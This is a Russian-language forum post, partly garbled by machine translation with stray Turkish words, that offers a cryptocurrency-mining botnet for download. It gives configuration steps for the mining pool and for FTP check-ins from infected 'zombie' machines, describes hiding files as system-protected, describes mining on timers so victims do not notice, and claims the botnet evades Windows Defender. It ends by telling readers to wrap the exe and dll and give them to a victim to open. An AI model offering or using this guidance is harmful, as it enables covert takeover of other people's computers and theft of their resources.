February 20, 2020

Crypto Mining BOTNET

Я хочу поделиться с вами ботнетом-майнером.

Он может майнить с помощью алгоритмов SHA-256 и Scrypt.

После того, как вы сделали конфигурацию, открыв учетную запись crypto pool, вы можете начать копать, сделав отвлечение для пользователей, которые станут тачками.

Говоря о его характеристиках:

  • Мудро решает, нагрузку для майнинга

С целью остаться незамеченным можно майнить не только в айдл но и в любое время, в определенных диапазонах.

- Маркирует файлы как "System Protected" с помощью SET_FILE_ATTRIBUTE в kernel32, чтобы их не заметили.

  1. - Журналы пути, содержащие информацию о системе зомби через FTP, чтобы вы могли проверить, все еще работает ли зомби в системе.

- Команды исполняются с использованием Pipes, которые могут быть прочитаны

Описание настройки:

- Pool адрес = stratum+tcp: / / ваш stratum.POOLADRES должен быть в форме.com: PORT.

- Pool K.

имя и пароль = self explanatory

- FTP адрес = в начале ftp: / / не должно быть files.ADRESİNİZ.com например.

(Я рекомендую использовать 000webhost)

- FTP K.

имя и пароль = self explanatory

-Время перезапуска в Idle / Non-Idle = время, в течение которого sorna tekar будет запущен, когда компьютер был terminate в состоянии idle(когда screen saver запускается) или нет.

-Время terminate в Idle / Non-Idle = время terminate в то время как ПК находится в состоянии idle(при запуске screen saver) или нет.

Цель этого параметра заключается в том, чтобы пользователь не был замечен, запустив Miner через определенные промежутки времени во время работы компьютера.

Например: в Non-Idle вы можете установить restart в 30dk и сделать terminate в 15мин(900sn).

Это в двух словах.

Не вводите неправильные значения при настройке, так как я не очень разбираюсь в обработке исключений.

Ваш FTP-адрес-Ваш пароль k.

пусть ваше имя будет правильным.

Integer не вводите string, где вам нужно ввести.

Крючок при запуске программы.

получить в том же месте, что и dll.

Если не будет работать.

Все, что вам нужно сделать для использования, это создать exe и dll с помощью wrapper, а затем передать его жертве, чтобы открыть его, когда exe и dll находятся в одном и том же месте.

UPDATE

changelog:

- Процесс майнинга был изменен и обновлен.

- Теперь майнить можно только в системах x64.

- Больше не обнаруживается Защитником Windows (по крайней мере, я так надеюсь).

- Исправлена ошибка в процессе терминация..

- Улучшено использование ЦП и использование логической нити.

- FTP logging немного детализирован.

Перешел в "nicehash".

(самый прибыльный пул)

- Добавлен изменяемый уровень пожертвования.

(Я был бы счастлив, если бы вы не сделали 0, но это все еще зависит от вас)

- Добавлена максимальная загрузка процессора, которая может быть изменена.

(немного в настоящее время в значениях после 60)

Шаг за шагом повествование:

1. Регистрируемся

www.nicehash.com

2. откройте биткойн-кошелек и скопируйте свой адрес добычи.

https://i.hizliresim.com/YdnrXa.png

3. Далее заполните дополнительные поля в конфигурации вместе с адресом.

4. запустите wrapper exe.

загрузите и откройте систему, которая будет майеить dll и exe в папке botnet

Скачать